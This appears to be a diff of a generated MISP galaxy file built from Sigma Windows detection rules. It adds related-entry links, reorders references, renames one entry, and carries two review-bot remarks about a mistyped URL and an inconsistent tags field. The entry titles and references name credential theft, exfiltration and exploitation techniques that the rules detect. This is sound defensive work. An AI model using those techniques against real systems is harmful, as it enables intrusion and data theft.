@@ -36303,8 +46385,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_adwind.yml" ], "tags": [ @@ -36313,6 +46395,22 @@ "attack.t1059.007" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1fac1481-2dbc-48b2-9096-753c49b4ec71", "value": "Adwind RAT / JRAT" }, @@ -36338,6 +46436,15 @@ "attack.s0005" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7aa7009a-28b9-4344-8c1f-159489a390df", "value": "Windows Credential Editor" }, @@ -36354,8 +46461,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/yosqueoy/ditsnap", "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://github.com/yosqueoy/ditsnap", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml" ], "tags": [ 
@@ -36363,6 +46470,15 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d3b70aad-097e-409c-9df2-450f80dc476b", "value": "DIT Snapshot Viewer Use" }, @@ -36379,8 +46495,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", + "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml" ], "tags": [ @@ -36388,6 +46504,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", "value": "WMIC Hotfix Recon" }, @@ -36404,8 +46529,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ss64.com/ps/foreach-object.htmll", "https://ss64.com/nt/for.html", + "https://ss64.com/ps/foreach-object.htmll", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_scan_loop.yml" ], @@ -36416,6 +46541,15 @@ "attack.t1018" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", "value": "Suspicious Scan Loop Network" }, 
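Review bot: The `@@ -36404,8 +46529,8 @@` hunk carries `"https://ss64.com/ps/foreach-object.htmll"` (double `l`) for `Suspicious Scan Loop Network`, a dead link that this regeneration only moves rather than corrects. This file appears to mirror the Sigma rule's `references:` list, so the fix belongs upstream in `proc_creation_win_network_scan_loop.yml` as `"https://ss64.com/ps/foreach-object.html"`, after which a regeneration picks it up; a hand edit here would be overwritten. A cheap check in the generator, a URL syntax validation or a HEAD request per reference, would catch this class of error before it lands in the galaxy.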
@@ -36462,6 +46596,15 @@ "attack.t1489" ] }, + "related": [ + { + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ce72ef99-22f1-43d4-8695-419dcb5d9330", "value": "Suspicious Stop Windows Service" }, @@ -36487,6 +46630,22 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", "value": "Encoded FromBase64String" }, @@ -36512,6 +46671,15 @@ "attack.t1482" ] }, + "related": [ + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", "value": "Launch TruffleSnout Executable" }, @@ -36537,6 +46705,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", "value": "Suspicious Get ComputerSystem Information with WMIC" }, @@ -36553,9 +46730,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", "https://twitter.com/oulusoyum/status/1191329746069655553", "https://twitter.com/mattifestation/status/1196390321783025666", - "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml" ], "tags": [ 
@@ -36565,6 +46742,22 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", "value": "Time Travel Debugging Utility Usage" }, @@ -36581,9 +46774,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/threat-detection-report/threats/qbot/", "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", + "https://redcanary.com/threat-detection-report/threats/qbot/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml" ], "tags": [ @@ -36591,6 +46784,15 @@ "attack.t1005" ] }, + "related": [ + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6a69f62d-ce75-4b57-8dce-6351eb55b362", "value": "Esentutl Steals Browser Information" }, @@ -36607,9 +46809,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml" ], "tags": [ 
@@ -36620,6 +46822,29 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", "value": "Abusing Findstr for Defense Evasion" }, @@ -36637,9 +46862,9 @@ "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", - "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml", + "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powertool_execution.yml" ], "tags": [ @@ -36674,6 +46899,22 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "bf90d72c-c00b-45e3-b3aa-68560560d4c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5bb68627-3198-40ca-b458-49f973db8752", "value": "Rundll32 Without Parameters" }, 
@@ -36702,6 +46943,22 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", "value": "WSL Execution" }, @@ -36770,6 +47027,15 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9fbf5927-5261-4284-a71d-f681029ea574", "value": "Compress Data and Lock With Password for Exfiltration With 7-ZIP" }, @@ -36794,6 +47060,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "44143844-0631-49ab-97a0-96387d6b2d7c", "value": "Download Files Using Notepad++ GUP Utility" }, @@ -36818,6 +47093,15 @@ "attack.t1027.009" ] }, + "related": [ + { + "dest-uuid": "0533ab23-3f7d-463f-9bd8-634d27e4dee1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "deb9b646-a508-44ee-b7c9-d8965921c6b6", "value": "Powershell Token Obfuscation - Process Creation" }, @@ -36892,6 +47176,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", "value": "Devtoolslauncher.exe Executes Specified Binary" }, 
@@ -36917,6 +47210,15 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", "value": "Judgement Panda Credential Access Activity" }, @@ -36933,8 +47235,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini.yml" ], @@ -36967,6 +47269,15 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "value": "7Zip Compressing Dump Files" }, @@ -37008,8 +47319,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224", "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", + "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml" ], "tags": [ 
@@ -37022,6 +47333,29 @@ "cve.2020.10189" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "846b866e-2a57-46ee-8e16-85fa92759be7", "value": "Exploited CVE-2020-10189 Zoho ManageEngine" }, @@ -37038,8 +47372,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps", + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml" ], "tags": [ @@ -37072,6 +47406,15 @@ "cve.2021.35211" ] }, + "related": [ + { + "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", "value": "Suspicious Serv-U Process Pattern" }, @@ -37097,6 +47440,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "value": "Wsudo Suspicious Execution" }, 
@@ -37113,8 +47465,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_proxy_exec_wmic.yml" ], "tags": [ @@ -37125,6 +47477,29 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e1693bc8-7168-4eab-8718-cdcaa68a1738", "value": "Office Processes Proxy Execution Through WMIC" }, @@ -37150,6 +47525,15 @@ "attack.t1218.010" ] }, + "related": [ + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", "value": "Suspicious Regsvr32 HTTP IP Pattern" }, @@ -37175,6 +47559,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bbeaed61-1990-4773-bf57-b81dbad7db2d", "value": "Curl Usage on Windows" }, 
@@ -37199,6 +47592,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6812a10b-60ea-420c-832f-dfcc33b646ba", "value": "Detection of PowerShell Execution via DLL" }, @@ -37223,11 +47625,20 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0bbc6369-43e3-453d-9944-cae58821c173", "value": "Execution via WorkFolders.exe" }, { - "description": "Detects suspicious sub processes spawned by PowerShell", + "description": "Detects suspicious child processes spawned by PowerShell", "meta": { "author": "Florian Roth, Tim Shelton", "creation_date": "2022/04/26", @@ -37245,7 +47656,7 @@ "tags": "No established tags" }, "uuid": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "value": "Suspicious PowerShell Sub Processes" + "value": "Suspicious PowerShell Child Processes" }, { "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", @@ -37284,8 +47695,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior", "https://twitter.com/ShadowChasing1/status/1552595370961944576", + "https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use.yml" ], "tags": [ 
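Review bot: In the `Suspicious PowerShell Child Processes` entry the context line `"tags": "No established tags"` gives `tags` a string, while every other entry in these hunks gives it an array such as `"tags": [ "attack.t1059.001" ]`, so a consumer that iterates `meta.tags` will break on this record; if the file is generated, the generator should emit `"tags": []` (or omit the key) when a rule carries no tags. The rename of `value` from `Suspicious PowerShell Sub Processes` to `Suspicious PowerShell Child Processes` keeps the uuid, but MISP presumably builds the galaxy tag text from `value`, so tags already applied with the old name may no longer resolve — worth stating in the commit message if intended. The entry's object opens before this hunk.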
@@ -37293,6 +47704,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f0507c0f-a3a2-40f5-acc6-7f543c334993", "value": "Suspicious Net Use Command Combo" }, @@ -37309,8 +47729,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", "https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", + "https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml" ], "tags": [ @@ -37321,6 +47741,22 @@ "attack.t1566.001" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fdd84c68-a1f6-47c9-9477-920584f94905", "value": "Exploit for CVE-2017-8759" }, @@ -37345,6 +47781,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "84b14121-9d14-416e-800b-f3b829c5a14d", "value": "Suspicious CustomShellHost Execution" }, 
@@ -37369,6 +47814,15 @@ "attack.t1562.010" ] }, + "related": [ + { + "dest-uuid": "824add00-99a1-4b15-9a2d-6c5683b7b497", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", "value": "Registry Disabling LSASS PPL" }, @@ -37416,6 +47870,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f548a603-c9f2-4c89-b511-b089f7e94549", "value": "Potential Persistence Execution Via Microsoft Compatibility Appraiser" }, @@ -37444,6 +47907,22 @@ "attack.t1620" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "4933e63b-9b77-476e-ab29-761bc5b7d15a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "value": "Base64 Encoded Reflective Assembly Load" }, @@ -37460,9 +47939,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml" ], "tags": [ 
@@ -37470,6 +47949,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "24c8392b-aa3c-46b7-a545-43f71657fe98", "value": "Suspicious Schtasks Schedule Types" }, @@ -37486,8 +47974,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http", + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_char_in_cmd.yml" ], "tags": [ @@ -37523,6 +48011,29 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aaf46cdc-934e-4284-b329-34aa701e3771", "value": "Application Whitelisting Bypass via Bginfo" }, 
@@ -37540,8 +48051,8 @@ "logsource.product": "windows", "refs": [ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", + "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml" ], "tags": [ @@ -37549,6 +48060,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "68bcd73b-37ef-49cb-95fc-edc809730be6", "value": "WMIC Unquoted Services Path Lookup" }, @@ -37565,8 +48085,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://twitter.com/orange_8361/status/1518970259868626944", + "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml" ], "tags": [ 
@@ -37590,12 +48110,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", "https://www.joeware.net/freetools/tools/adfind/", - "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", - "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml" ], "tags": [ @@ -37606,6 +48126,22 @@ "attack.t1069.002" ] }, + "related": [ + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", "value": "Renamed AdFind Detection" }, 
